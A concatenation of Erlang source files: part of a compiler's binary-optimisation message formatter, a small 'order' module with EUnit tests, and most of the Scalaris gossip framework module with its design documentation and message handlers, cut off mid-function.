format_opt_info_1({fun_call, Call}) ->
    io_lib:format("binary is used in fun call (~s)",
                  [format_call(Call)]);
format_opt_info_1({multiple_uses_in_call, Call}) ->
    io_lib:format("binary is passed as multiple arguments to ~s",
                  [format_call(Call)]);
format_opt_info_1({no_match_on_entry, Call}) ->
    io_lib:format("binary is used in call to ~s which does not begin with a "
                  "suitable binary match", [format_call(Call)]);
format_opt_info_1({used_before_match, #b_set{op=call,args=[Call|_]}}) ->
    io_lib:format("binary is used in call to ~s before being matched",
                  [format_call(Call)]);
format_opt_info_1({used_before_match, #b_set{op={bif, BIF},args=Args}}) ->
    io_lib:format("binary is used in ~p/~p before being matched",
                  [BIF, length(Args)]);
format_opt_info_1({used_before_match, #b_set{op=phi}}) ->
    io_lib:format("binary is returned from an expression before being "
                  "matched", []);
format_opt_info_1({used_before_match, #b_set{op=Op}}) ->
    io_lib:format("binary is used in '~p' before being matched",[Op]);
format_opt_info_1(Term) ->
    io_lib:format("~w", [Term]).

%% Renders a call target as name/arity (local), mod:name/arity (remote),
%% or the raw term for funs.
format_call(#b_local{name=#b_literal{val=F},arity=A}) ->
    io_lib:format("~p/~p", [F, A]);
format_call(#b_remote{mod=#b_literal{val=M},name=#b_literal{val=F},arity=A}) ->
    io_lib:format("~p:~p/~p", [M, F, A]);
format_call(Fun) ->
    io_lib:format("~p", [Fun]).
-module(order).
-compile(no_auto_import).
-include_lib("eunit/include/eunit.hrl").
-export([reverse/1, to_int/1, compare/2, max/2, min/2]).
%% Flips an ordering: lt becomes gt, gt becomes lt, and eq is unchanged.
reverse(lt) -> gt;
reverse(eq) -> eq;
reverse(gt) -> lt.
-ifdef(TEST).
%% EUnit: reverse/1 swaps lt and gt and leaves eq untouched.
reverse_test() ->
    expect:equal(reverse(lt), gt),
    expect:equal(reverse(eq), eq),
    expect:equal(reverse(gt), lt).
-endif.
%% Maps an ordering onto the conventional comparison integers:
%% lt -> -1, eq -> 0, gt -> 1.
to_int(lt) -> -1;
to_int(eq) -> 0;
to_int(gt) -> 1.
-ifdef(TEST).
%% EUnit: to_int/1 maps lt/eq/gt onto -1/0/1.
to_int_test() ->
    expect:equal(to_int(lt), -1),
    expect:equal(to_int(eq), 0),
    expect:equal(to_int(gt), 1).
-endif.
%% Compares two orderings with each other, treating lt < eq < gt.
%% The clause order matches the original case expression exactly so the
%% fall-through behaviour is preserved.
compare(lt, lt) -> eq;
compare(lt, _) -> lt;
compare(eq, eq) -> eq;
compare(gt, gt) -> eq;
compare(eq, gt) -> lt;
compare(_, _) -> gt.
-ifdef(TEST).
%% EUnit: exhaustive 3x3 table for compare/2 (lt < eq < gt).
compare_test() ->
    expect:equal(compare(lt, lt), eq),
    expect:equal(compare(lt, eq), lt),
    expect:equal(compare(lt, gt), lt),
    expect:equal(compare(eq, lt), gt),
    expect:equal(compare(eq, eq), eq),
    expect:equal(compare(eq, gt), lt),
    expect:equal(compare(gt, lt), gt),
    expect:equal(compare(gt, eq), gt),
    expect:equal(compare(gt, gt), eq).
-endif.
%% Returns the larger of two orderings (lt < eq < gt). Safe to define
%% locally because the module disables auto-imports (no clash with the
%% erlang:max/2 BIF).
max(gt, _) -> gt;
max(eq, lt) -> eq;
max(_, B) -> B.
-ifdef(TEST).
%% EUnit: exhaustive 3x3 table for max/2 (lt < eq < gt).
max_test() ->
    expect:equal(max(lt, lt), lt),
    expect:equal(max(lt, eq), eq),
    expect:equal(max(lt, gt), gt),
    expect:equal(max(eq, lt), eq),
    expect:equal(max(eq, eq), eq),
    expect:equal(max(eq, gt), gt),
    expect:equal(max(gt, lt), gt),
    expect:equal(max(gt, eq), gt),
    expect:equal(max(gt, gt), gt).
-endif.
%% Returns the smaller of two orderings (lt < eq < gt). Safe to define
%% locally because the module disables auto-imports (no clash with the
%% erlang:min/2 BIF).
min(lt, _) -> lt;
min(eq, gt) -> eq;
min(_, B) -> B.
-ifdef(TEST).
%% EUnit: exhaustive 3x3 table for min/2 (lt < eq < gt).
min_test() ->
    expect:equal(min(lt, lt), lt),
    expect:equal(min(lt, eq), lt),
    expect:equal(min(lt, gt), lt),
    expect:equal(min(eq, lt), lt),
    expect:equal(min(eq, eq), eq),
    expect:equal(min(eq, gt), eq),
    expect:equal(min(gt, lt), lt),
    expect:equal(min(gt, eq), eq),
    expect:equal(min(gt, gt), gt).
-endif.
% @copyright 2010-2015 Zuse Institute Berlin
% Licensed under the Apache License, Version 2.0 (the "License");
% you may not use this file except in compliance with the License.
% You may obtain a copy of the License at
%
% http://www.apache.org/licenses/LICENSE-2.0
%
% Unless required by applicable law or agreed to in writing, software
% distributed under the License is distributed on an "AS IS" BASIS,
% WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
% See the License for the specific language governing permissions and
% limitations under the License.
%% @author <NAME> <<EMAIL>>
%%
%% @doc The behaviour module (gossip_beh.erl) of the gossiping framework.
%%
%% The framework is designed to allow the implementation of gossip based
%% dissemination and gossip based aggregation protocols. Anti-entropy
%% gossiping was not considered. The communication scheme used by the
%% framework is push-pull gossiping as this offers the best speed of
%% convergence. The membership protocol used for the peer selection is
%% Cyclon.
%%
%% The gossiping framework comprises three kinds of components:
%% <ol>
%% <li> The gossiping behaviour (interface) gossip_beh.erl. The
%% behaviour defines the contract that allows the callback module
%% to be used by the behaviour module. The behaviour defines the
%% contract by specifying functions the callback module has to
%% implement. </li>
%% <li> The callback modules. A callback module implements a concrete
%% gossiping protocol by implementing the gossip_beh.erl, i.e. by
%% implementing the functions specified in the gossip_beh.erl.
%% The callback module provides the protocol specific code.
%% For an example callback module see gossip_load.erl.</li>
%% <li> The behaviour module gossip.erl (this module). The behaviour
%% module provides the generic code of the gossiping framework.
%% It calls the callback functions of the callback modules defined
%% in gossip_beh.erl.</li>
%% </ol>
%%
%% The relation between behaviour and callback modules is modelled as a
%% one-to-many relation. That is to say, the behaviour module is implemented
%% as single process (per node) and all the callback module run in the
%% context of this single process. This has the advantage of reducing the
%% number of spawned processes and allowing for a better grouping of messages.
%%
%% The framework is started as part of the startup procedure of a dht_node.
%% The framework maintains a list of callback modules in the CBMODULES macro
%% which are started together with the framework. It is also possible to
%% individually start and stop callback modules later.
%%
%% The pattern for communication between the behaviour module and a callback
%% module is the following: From the behaviour module to a callback module
%% communication occurs as a call to a function of the callback module.
%% These calls have to return quickly, no long-lasting operations, especially
%% no receiving of messages, are allowed. Therefore, the answers to these
%% function calls are mainly realised as messages from the respective
%% callback module to the behaviour module, not as return values of the
%% function calls.
%%
%% == Phases of a Gossiping Operation ==
%%
%% === Prepare-Request Phase ===
%%
%% The prepare-request phase consists of peer and data selection. The
%% selection of the peer is usually managed by the framework. At the beginning
%% of every cycle the behaviour module requests a peer from the Cyclon
%% module of Scalaris, which is then used for the data exchange. The peer
%% selection is governed by the select_node() function: returning
%% false causes the behaviour module to handle the peer selection as described.
%% Returning true causes the behaviour module to expect a selected_peer
%% message with a peer to be used for the exchange. How many peers are
%% contacted for data exchanges every cycle depends on the fanout() config
%% function.
%%
%% The selection of the exchange data is dependent on the specific gossiping
%% task and therefore done by a callback module. It is initiated by a call
%% to select_data(). When called with select_data(), the respective callback
%% module has to initiate a selected_data message to the behaviour module,
%% containing the selected exchange data. Both peer and data selection are
%% initiated in immediate succession through periodical trigger messages,
%% so they can run concurrently. When both data and peer are received by
%% the behaviour module, a p2p_exch message with the exchange data is sent
%% to the peer, that is to say to the gossip behaviour module of the peer.
%%
%% === Prepare-Reply Phase ===
%%
%% Upon receiving a p2p_exch message, a node enters the prepare-reply
%% phase and is now in its passive role as responder. This phase is about
%% the integration of the received data and the preparation of the reply data.
%% Both of these tasks need to be handled by the callback module. The
%% behaviour module passes the received data with a call to select_reply_data(QData)
%% to the correspondent callback module, which merges the data with its own
%% local data and prepares the reply data. The reply data is sent back to
%% the behaviour module with a selected_reply_data message. The behaviour
%% module then sends the reply data as a p2p_exch_reply message back to
%% the original requester.
%%
%% === Integrate-Reply Phase ===
%%
%% The integrate-reply phase is triggered by a p2p_exch_reply message.
%% Every p2p_exch_reply is the response to an earlier p2p_exch (although
%% not necessarily to the last p2p_exch request). The p2p_exch_reply contains
%% the reply data from the peer, which is passed to the correspondent
%% callback module with a call to integrate_data(QData). The callback module
%% processes the received data and signals to the behaviour module the
%% completion with an integrated_data message. On a conceptual level, a full
%% cycle is finished at this point and the behaviour module counts cycles
%% by counting the integrated_data messages. Due to the uncertainties
%% of message delays and local clock drift it should be clear however, that
%% this can only be an approximation. For instance, a new cycle could have
%% been started before the reply to the current request has been received
%% (phase interleaving) and, respectively, replies from the other cycle could
%% be "wrongly" counted as finishing the current cycle (cycle interleaving).
%%
%% == Instantiation ==
%%
%% Many of the interactions conducted by the behaviour module are specific
%% to a certain callback module. Therefore, all messages and function
%% concerning a certain callback module need to identify with which callback
%% module the message or call is associated. This is achieved by adding a
%% tuple of the module name and an instance id to all those messages and
%% calls. While the name would be enough to identify the module, adding the
%% instance id allows for multiple instantiation of the same callback module
%% by one behaviour module. This tuple of callback module and instance id
%% is also used to store information specific to a certain callback module
%% in the behaviour module's state.
%%
%%
%% == Messages to the Callback Modules (cb_msg) ==
%%
%% Messages which shall be passed directly to a callback module need to have
%% the form {cb_msg, CBModule, Msg}, where CBModule is of type cb_module() and
%% Msg is any message the respective callback module handles.
%%
%% Messages in this form are unpacked by the gossip module and only the Msg
%% is sent to the given CBModule.
%%
%% If a callback module wants to receive a response from another process, it
%% should pack its Pid with an envelope of the form
%% {PidOfRequestor, e, 3, {cb_msg, CBModule, '_'}}
%% with a call to
%% EnvPid = comm:reply_as(PidOfRequestor, 3, {cb_msg, CBModule, '_'})
%% and use the EnvPid as SourcePid when sending the request, e.g.
%% comm:send(Pid, {get_dht_nodes, EnvPid}, [{?quiet}])
%%
%%
%% == Used abbreviations ==
%%
%% <ul>
%% <li> cb: callback module (a module implementing the
%% gossip_beh.erl behaviour)
%% </li>
%% </ul>
%%
%% @version $Id$
-module(gossip).
-author('<EMAIL>').
-vsn('$Id$').
-behaviour(gen_component).
-include("scalaris.hrl").
-include("record_helpers.hrl").
% interaction with gen_component
-export([init/1, on_inactive/2, on_active/2]).
%API
-export([start_link/1, activate/1, remove_all_tombstones/0, check_config/0]).
% interaction with the ring maintenance:
-export([rm_filter_slide_msg/3, rm_send_activation_msg/5, rm_my_range_changed/3, rm_send_new_range/5]).
% testing and debugging
-export([start_gossip_task/2, stop_gossip_task/1, tester_create_cb_module_names/1]).
-include("gen_component.hrl").
%% -define(PDB, pdb_ets). % easier debugging because state accessible from outside the process
-define(PDB_OPTIONS, [set]).
-define(PDB, pdb). % better performance
% prevent warnings in the log
-define(SEND_TO_GROUP_MEMBER(Pid, Process, Msg),
comm:send(Pid, Msg, [{group_member, Process}, {shepherd, self()}])).
%% -define(SHOW, config:read(log_level)).
-define(SHOW, debug).
%-define(TRACE(X,Y), log:pal(X,Y)).
%% -define(TRACE(X,Y), ok).
-define(TRACE_TRIGGER(FormatString, Data), ok).
%% -define(TRACE_TRIGGER(FormatString, Data), log:pal(FormatString, Data)).
-define(TRACE_ROUND(FormatString, Data), ok).
%% -define(TRACE_ROUND(FormatString, Data), log:pal(FormatString, Data)).
%% list of callback modules to be activated on startup
-define(CBMODULES, [{gossip_load, default}, {gossip_cyclon, default}, {gossip_vivaldi, default}]).
% for development, should be disabled for production
-define(FIRST_TRIGGER_DELAY, 0). % delay in s for first trigger
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% Type Definitions
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
-type status() :: init | uninit.
-type cb_module_name() :: module().
-type cb_module_id() :: Id :: atom() | uid:global_uid().
-type cb_module() :: {Module::cb_module_name(), Id::cb_module_id()}.
-type cb_status() :: unstarted | started | tombstone.
-type exch_data() :: { ExchData :: undefined | any(), Peer :: undefined | comm:mypid()}.
-type cb_fun_name() :: handle_msg | integrate_data | notify_change | round_has_converged |
select_data | select_node | select_reply_data | web_debug_info | shutdown.
% state record
-record(state, {
cb_modules = [] :: [cb_module()] ,
msg_queue = msg_queue:new() :: msg_queue:msg_queue(),
range = intervals:all() :: intervals:interval(),
status = uninit :: init | uninit,
trigger_add = [] :: [pos_integer()],
trigger_groups = [] :: [{TriggerInterval::pos_integer(), CBModules::[cb_module()]}],
trigger_locks = [] :: [{cb_module(), locked | free}],
trigger_remove = [] :: [pos_integer()],
cb_states = [] :: [{cb_module(), any()}],
cb_stati = [] :: [{cb_module(), cb_status()}],
cycles = [] :: [{cb_module(), non_neg_integer()}],
exch_datas = [] :: [{cb_module(), exch_data()}],
reply_peers = [] :: [{Ref::pos_integer(), Pid::comm:mypid()}],
rounds= [] :: [{cb_module(), non_neg_integer()}]
}).
-type state() :: #state{}.
% accepted messages of gossip behaviour module
-type send_error() :: {send_error, _Pid::comm:mypid(), Msg::message(), Reason::atom()}.
-type bh_message() ::
{activate_gossip, Neighbors::nodelist:neighborhood()} |
{start_gossip_task, CBModule::cb_module(), Args::list()} |
{gossip_trigger, TriggerInterval::pos_integer()} |
{trigger_action, TriggerInterval::pos_integer()} |
{update_range, NewRange::intervals:interval()} |
{web_debug_info, SourcePid::comm:mypid()} |
send_error() |
{bulkowner, deliver, Id::uid:global_uid(), Range::intervals:interval(),
Msg::comm:message(), Parents::[comm:mypid(),...]} |
{remove_all_tombstones}.
%% Messages addressed to (an instance of) a callback module. Note: the round
%% status of an integrated_data message is cur_round | prev_round, matching
%% the two integrated_data clauses of handle_msg/2.
-type cb_message() ::
    {selected_data, CBModule::cb_module(), PData::gossip_beh:exch_data()} |
    {selected_peer, CBModule::cb_module(), CyclonMsg::{cy_cache,
            RandomNodes::[node:node_type()]} } |
    {p2p_exch, CBModule::cb_module(), SourcePid::comm:mypid(),
        PData::gossip_beh:exch_data(), OtherRound::non_neg_integer()} |
    {selected_reply_data, CBModule::cb_module(), QData::gossip_beh:exch_data(),
        Ref::pos_integer(), Round::non_neg_integer()} |
    {p2p_exch_reply, CBModule::cb_module(), SourcePid::comm:mypid(),
        QData::gossip_beh:exch_data(), OtherRound::non_neg_integer()} |
    {integrated_data, CBModule::cb_module(), RoundStatus::cur_round | prev_round} |
    {new_round, CBModule::cb_module(), NewRound::non_neg_integer()} |
    {cb_msg, CBModule::cb_module(), Msg::comm:message()} |
    {stop_gossip_task, CBModule::cb_module()} |
    {no_msg}.

-type message() :: bh_message() | cb_message().
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% API
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% @doc Starts the process of the gossip module.
%%      Called by sup_dht_node; delegates to gen_component:start_link/4 and
%%      joins the given pid group under the name 'gossip'.
-spec start_link(pid_groups:groupname()) -> {ok, pid()}.
start_link(DHTNodeGroup) ->
    Options = [{wait_for_init},
               {pid_groups_join_as, DHTNodeGroup, gossip}],
    gen_component:start_link(?MODULE, fun ?MODULE:on_inactive/2, [], Options).
%% @doc Initialises the state of the gossip module.
%%      Called by gen_component; the process starts with the on_inactive
%%      handler. Sets up the (uninfected) base trigger with interval 1s.
-spec init([]) -> state().
init([]) ->
    % initialise the base trigger, then return a fresh state record
    msg_delay:send_trigger(?FIRST_TRIGGER_DELAY, {gossip_trigger, 1}),
    #state{}.
%% @doc Activates the gossip module.
%%      Called by dht_node_join. If this node covers the whole ring it is the
%%      only node of the system and gossip is activated immediately; otherwise
%%      a ring-maintenance subscription defers activation until a
%%      slide_finished message arrives. Activation eventually switches the
%%      process to the on_active handler.
-spec activate(Neighbors::nodelist:neighborhood()) -> ok.
activate(Neighbors) ->
    OnlyNode = nodelist:node_range(Neighbors) =:= intervals:all(),
    case OnlyNode of
        true ->
            % first node covering the whole ring: start gossip right away,
            % it is needed for passive load balancing when new nodes join
            comm:send_local(pid_groups:get_my(gossip),
                            {activate_gossip, Neighbors});
        false ->
            % subscribe to the ring maintenance (rm) for
            % {slide_finished, succ} or {slide_finished, pred}
            rm_loop:subscribe(self(), ?MODULE,
                              fun gossip:rm_filter_slide_msg/3,
                              fun gossip:rm_send_activation_msg/5, 1)
    end.
%% @doc Globally removes all tombstones from previously stopped callback modules.
%%      Issues a bulkowner operation over the whole key space which delivers a
%%      remove_all_tombstones message to the gossip process of every node.
-spec remove_all_tombstones() -> ok.
remove_all_tombstones() ->
    bulkowner:issue_bulk_owner(
      uid:get_global_uid(), intervals:all(),
      {?send_to_group_member, gossip, {remove_all_tombstones}}).
%% @doc Checks whether the received notification is a {slide_finished, succ}
%%      or {slide_finished, pred} msg. Used as filter function for the ring
%%      maintenance subscription (the neighborhood arguments are ignored).
-spec rm_filter_slide_msg(Neighbors, Neighbors, Reason) -> boolean() when
      is_subtype(Neighbors, nodelist:neighborhood()),
      is_subtype(Reason, rm_loop:reason()).
rm_filter_slide_msg(_OldNeighbors, _NewNeighbors, Reason) ->
    lists:member(Reason, [{slide_finished, pred}, {slide_finished, succ}]).
%% @doc Sends the activation message to the behaviour module (this module).
%%      Used as execution function of the rm subscription created in
%%      activate/1, i.e. it fires on {slide_finished, succ} or
%%      {slide_finished, pred} (see rm_filter_slide_msg/3).
-spec rm_send_activation_msg(Subscriber, ?MODULE, Neighbours, Neighbours, Reason) -> ok when
      is_subtype(Subscriber, pid()),
      is_subtype(Neighbours, nodelist:neighborhood()),
      is_subtype(Reason, rm_loop:reason()).
rm_send_activation_msg(_Pid, ?MODULE, _OldNeighbours, NewNeighbours, _Reason) ->
    comm:send_local(pid_groups:get_my(gossip),
                    {activate_gossip, NewNeighbours}).
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% Main Message Loop
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%-------------------------- on_inactive ---------------------------%%

%% @doc Message handler during the startup of the gossip module.
%%      Handles the activation message, keeps the base trigger alive, rejects
%%      exchange requests from peers and queues messages which can only be
%%      processed once the module is active.
-spec on_inactive(Msg::message(), State::state()) -> state().
on_inactive({activate_gossip, Neighbors}, State) ->
    MyRange = nodelist:node_range(Neighbors),
    State1 = state_set(status, init, State),
    % subscribe to ring maintenance (rm) for range changes (permanent subscription)
    rm_loop:subscribe(self(), ?MODULE,
                      fun gossip:rm_my_range_changed/3,
                      fun gossip:rm_send_new_range/5, inf),
    % set range and notify cb modules about leader state
    State2 = state_set(range, MyRange, State1),
    Msg1 = case is_leader(MyRange) of
               true -> {is_leader, MyRange};
               false -> {no_leader, MyRange}
           end,
    State3 = lists:foldl(fun(CBModule, StateIn) ->
                                 NewState = cb_notify_change(leader, Msg1, CBModule, StateIn),
                                 NewState
                         end, State2, state_get(cb_modules, State2)),
    % start the statically configured gossip tasks (?CBMODULES)
    State4 = init_gossip_tasks(Neighbors, State3),
    % re-send all queued messages, to be handled by the active handler
    State5 = msg_queue_send(State4),
    % change handler to on_active
    gen_component:change_handler(State5, fun ?MODULE:on_active/2);

% keep the trigger chain alive, but do not start cycles while inactive
on_inactive({gossip_trigger, TriggerInterval}=_Msg, State) ->
    ?TRACE_TRIGGER("[ Gossip ] on_inactive: ~w", [_Msg]),
    handle_trigger(TriggerInterval, State);

% reject data exchange requests from peers: reply with a send_error so the
% requester's exch_failure handling kicks in
on_inactive({p2p_exch, _CBModule, SourcePid, _PData, _Round}=Msg, State) ->
    comm:send(SourcePid, {send_error, comm:this(), Msg, on_inactive}),
    State;

on_inactive({p2p_exch_reply, _CBModule, SourcePid, _QData, _Round}=Msg, State) ->
    comm:send(SourcePid, {send_error, comm:this(), Msg, on_inactive}),
    State;

%% for debugging
on_inactive(print_state, State) ->
    log:log(warn, "~s", [to_string(State)]),
    State;

% the following messages cannot be handled yet; queue them for processing
% right after activation (see msg_queue_send/1 above)
on_inactive({web_debug_info, _Requestor}=Msg, State) ->
    msg_queue_add(Msg, State);

on_inactive({stop_gossip_task, _CBModule}=Msg, State) ->
    msg_queue_add(Msg, State);

on_inactive({start_gossip_task, _CBModule, _Args}=Msg, State) ->
    msg_queue_add(Msg, State);

on_inactive({remove_all_tombstones}=Msg, State) ->
    msg_queue_add(Msg, State);

on_inactive({cb_msg, _CBModule, _msg}=Msg, State) ->
    msg_queue_add(Msg, State);

%% consume all other messages (including: trigger messages)
on_inactive(_Msg, State) ->
    State.
%%--------------------------- on_active ----------------------------%%

%% @doc Message handler during the normal operation of the gossip module.
%%      Handles framework messages itself; messages addressed to a specific
%%      callback module (tagged with a cb_module() as second tuple element)
%%      fall through to the last clause, which dispatches to handle_msg/2.
%% @end
-spec on_active(Msg::message(), State::state()) -> state().
on_active({deactivate_gossip}, _State) ->
    rm_loop:unsubscribe(self(), ?MODULE),
    % discard the old state and return to the startup handler
    gen_component:change_handler(#state{}, fun ?MODULE:on_inactive/2);

%% This message is received from self() from init_gossip_task or through
%% start_gossip_task()/bulkowner
on_active({start_gossip_task, CBModule, Args}, State) ->
    CBModules = state_get(cb_modules, State),
    State1 = case lists:member(CBModule, CBModules) of
                 true ->
                     log:log(warn, "[ Gossip ] Trying to start an already existing Module: ~w ."
                             ++ "Request will be ignored.", [CBModule]),
                     State;
                 false -> init_gossip_task(CBModule, Args, State)
             end,
    State1;

%% Trigger message starting a new cycle: renew the trigger (handle_trigger/2)
%% and fan out one trigger_action message per callback module of this
%% trigger's interval group.
on_active({gossip_trigger, TriggerInterval}=_Msg, State) ->
    ?TRACE_TRIGGER("[ Gossip ]:~w", [_Msg]),
    State1 = handle_trigger(TriggerInterval, State),
    case state_get({trigger_group, TriggerInterval}, State) of
        false ->
            State1; %% trigger group does not exist, do nothing (e.g. during startup)
        CBModules ->
            [ comm:send_local(self(), {trigger_action, CBModule}) || CBModule <- CBModules ],
            State1
    end;

%% Starts the prepare-request phase for one callback module, unless the
%% module is still within a previous prepare-request phase (trigger_lock).
on_active({trigger_action, CBModule}=_Msg, State) ->
    State1 = msg_queue_send(State),
    case state_get({trigger_lock, CBModule}, State1) of
        free ->
            log:log(debug, "[ Gossip ] Module ~w got triggered", [CBModule]),
            log:log(?SHOW, "[ Gossip ] Cycle: ~w, Round: ~w",
                    [state_get({cycle, CBModule}, State1), state_get({round, CBModule}, State1)]),
            %% set cycle status to active
            State2 = state_set({trigger_lock, CBModule}, locked, State1),
            %% reset exch_data
            State3 = state_set({exch_data, CBModule}, {undefined, undefined}, State2),
            %% request node (by the cb module or the bh module)
            State4 = case cb_select_node(CBModule, State3) of
                         {true, NewState} -> NewState;
                         {false, NewState} -> request_random_node(CBModule), NewState
                     end,
            %% request data
            State5 = cb_select_data(CBModule, State4),
            State5;
        locked -> State1 % ignore trigger when within prepare-request phase
    end;

%% received through the rm on key range changes: store the new range and
%% notify all callback modules about the (possibly changed) leader state
on_active({update_range, NewRange}, State) ->
    State1 = state_set(range, NewRange, State),
    Msg = case is_leader(NewRange) of
              true -> {is_leader, NewRange};
              false -> {no_leader, NewRange}
          end,
    Fun = fun (CBModule, StateIn) ->
                  StateOut = cb_notify_change(leader, Msg, CBModule, StateIn),
                  StateOut
          end,
    CBModules = state_get(cb_modules, State1),
    lists:foldl(Fun, State1, CBModules);

%% request for debug info: collect key/value lists from the framework and
%% from every callback module, separated by empty entries
on_active({web_debug_info, Requestor}, State) ->
    CBModules = state_get(cb_modules, State),
    Fun = fun(CBModule, {KVListIn, StateIn}) ->
                  {KVListCBModule, NewState} = cb_web_debug_info(CBModule, StateIn),
                  {KVListIn ++ [{"",""}] ++ KVListCBModule, NewState}
          end,
    {KVListCBModule, State1} = lists:foldr(Fun, {[], State}, CBModules),
    KVListAll = [{"",""}] ++ web_debug_info(State) ++ KVListCBModule,
    comm:send_local(Requestor, {web_debug_info_reply, KVListAll}),
    State1;

%% received from shepherd, from on_inactive or from rejected messages;
%% failed exchange messages are reported to the respective callback module
on_active({send_error, _Pid, Msg, Reason}=ErrorMsg, State) ->
    % unpack msg if necessary
    MsgUnpacked = case Msg of
                      % msg from shepherd
                      {_, ?MODULE, OriginalMsg} -> OriginalMsg;
                      % other send_error msgs, e.g. from on_inactive
                      _Msg -> _Msg
                  end,
    CBStatus = state_get({cb_status, element(2, MsgUnpacked)}, State),
    case MsgUnpacked of
        _ when CBStatus =:= tombstone ->
            % NOTE: 'warn' is the log level atom here (was erroneously written
            % as a call to a nonexistent local function warn/0)
            log:log(warn, "[ Gossip ] Got ~w msg for tombstoned module ~w. Reason: ~w. Original Msg: ~w",
                    [element(1, ErrorMsg), element(2, MsgUnpacked), Reason, element(1, Msg)]),
            State;
        {p2p_exch, CBModule, _SourcePid, PData, Round} ->
            log:log(warn, "[ Gossip ] p2p_exch from ~w (gossip) to ~w (dht_node)" ++
                        " failed because of ~w", [_SourcePid, _Pid, Reason]),
            NewState1 = cb_notify_change(exch_failure, {p2p_exch, PData, Round}, CBModule, State),
            NewState1;
        {p2p_exch_reply, CBModule, _SourcePid, QData, Round} ->
            log:log(warn, "[ Gossip ] p2p_exch_reply failed because of ~w", [Reason]),
            NewState1 = cb_notify_change(exch_failure, {p2p_exch_reply, QData, Round}, CBModule, State),
            NewState1;
        _ ->
            log:log(?SHOW, "[ Gossip ] Failed to deliever the Msg ~w because ~w", [Msg, Reason]),
            State
    end;

%% unpack bulkowner msg and re-dispatch its payload to self
on_active({bulkowner, deliver, _Id, _Range, Msg, _Parents}, State) ->
    comm:send_local(self(), Msg),
    State;

%% received through remove_all_tombstones()/bulkowner
on_active({remove_all_tombstones}, State) ->
    lists:foldl(fun(CBModule, StateIn) -> state_remove({cb_status, CBModule}, StateIn) end,
                State, get_tombstones(State));

%% for debugging
on_active(print_state, State) ->
    log:log(warn, "~s", [to_string(State)]),
    State;

%% for debugging
on_active({get_state, SourcePid}, State) ->
    comm:send(SourcePid, State),
    State;

%% Only messages for callback modules are expected to reach this on_active clause.
%% They have the form:
%%  {MsgTag, CBModule, ...}
%%  element(1, Msg) = MsgTag
%%  element(2, Msg) = CBModule
on_active(Msg, State) ->
    State1 = try state_get({cb_status, element(2, Msg)}, State) of
                 tombstone ->
                     log:log(warn, "[ Gossip ] Got ~w msg for tombstoned module ~w",
                             [element(1, Msg), element(2, Msg)]),
                     State;
                 started ->
                     handle_msg(Msg, State);
                 false ->
                     log:log(warn, "[ Gossip ] Unknown Callback Module: ~w", [element(2, Msg)]),
                     State
             catch
                 % e.g. Msg is not a tuple of arity >= 2
                 _:_ -> log:log(warn, "[ Gossip ] Unknown msg: ~w", [Msg]),
                        State
             end,
    State1.
%% @doc Handles all messages addressed to a specific callback module,
%%      dispatched from the last clause of on_active/2.
%%      Drives the exchange phases described in the module documentation:
%%      peer/data selection, p2p_exch(_reply) handling and round/cycle
%%      bookkeeping.

%% This message is received as a response to a get_subset message to the
%% cyclon process and should contain a list of random nodes.
-spec handle_msg(Msg::cb_message(), State::state()) -> state().
% re-request node if node list is empty
handle_msg({selected_peer, CBModule, _Msg={cy_cache, []}}, State) ->
    % retry after the module's trigger interval (in ms, see cb_config/2)
    Delay = cb_config(trigger_interval, CBModule),
    request_random_node_delayed(Delay, CBModule),
    State;

handle_msg({selected_peer, CBModule, _Msg={cy_cache, Nodes}}, State) ->
    log:log(info, "selected_peer: ~w, ~w", [CBModule, _Msg]),
    % if the exchange data was already selected, start the exchange right
    % away; otherwise store the peer(s) until the selected_data msg arrives
    {_Node, PData} = state_get({exch_data, CBModule}, State),
    case PData of
        undefined -> state_set({exch_data, CBModule}, {Nodes, undefined}, State);
        _ -> start_p2p_exchange(Nodes, PData, CBModule, State)
    end;

%% This message is a reply from a callback module to CBModule:select_data()
handle_msg({selected_data, CBModule, PData}, State) ->
    % check if a peer has been received already
    {Peer, _PData} = state_get({exch_data, CBModule}, State),
    case Peer of
        undefined -> state_set({exch_data, CBModule}, {undefined, PData}, State);
        _ -> start_p2p_exchange(Peer, PData, CBModule, State)
    end;

%% This message is a request from another peer (i.e. another gossip module) to
%% exchange data, usually results in CBModule:select_reply_data().
%% The requester is stored under a unique ref so the selected_reply_data msg
%% can later be routed back to it; check_round/3 decides how the peer's round
%% relates to the local round (see the round handling clauses below).
handle_msg({p2p_exch, CBModule, SourcePid, PData, OtherRound}=Msg, State) ->
    log:log(debug, "[ Gossip ] p2p_exch msg received from ~w. PData: ~w",[SourcePid, PData]),
    State1 = state_set({reply_peer, Ref=uid:get_pids_uid()}, SourcePid, State),
    case check_round(OtherRound, CBModule, State1) of
        {ok, State2} ->
            cb_select_reply_data(PData, Ref, OtherRound, Msg, CBModule, State2);
        {start_new_round, State2} -> % self is leader
            ?TRACE_ROUND("[ Gossip ] Starting a new round in p2p_exch", []),
            % notify own cb module and propagate the new round to the peer
            State3 = cb_notify_change(new_round, state_get({round, CBModule}, State2), CBModule, State2),
            State4 = cb_select_reply_data(PData, Ref, OtherRound, Msg, CBModule, State3),
            comm:send(SourcePid, {new_round, CBModule, state_get({round, CBModule}, State4)}),
            State4;
        {enter_new_round, State2} ->
            ?TRACE_ROUND("[ Gossip ] Entering a new round in p2p_exch", []),
            State3 = cb_notify_change(new_round, state_get({round, CBModule}, State2), CBModule, State2),
            State4 = cb_select_reply_data(PData, Ref, OtherRound, Msg, CBModule, State3),
            State4;
        {propagate_new_round, State2} -> % i.e. MyRound > OtherRound
            ?TRACE_ROUND("[ Gossip ] propagate round in p2p_exch", []),
            State3 = cb_select_reply_data(PData, Ref, OtherRound, Msg, CBModule, State2),
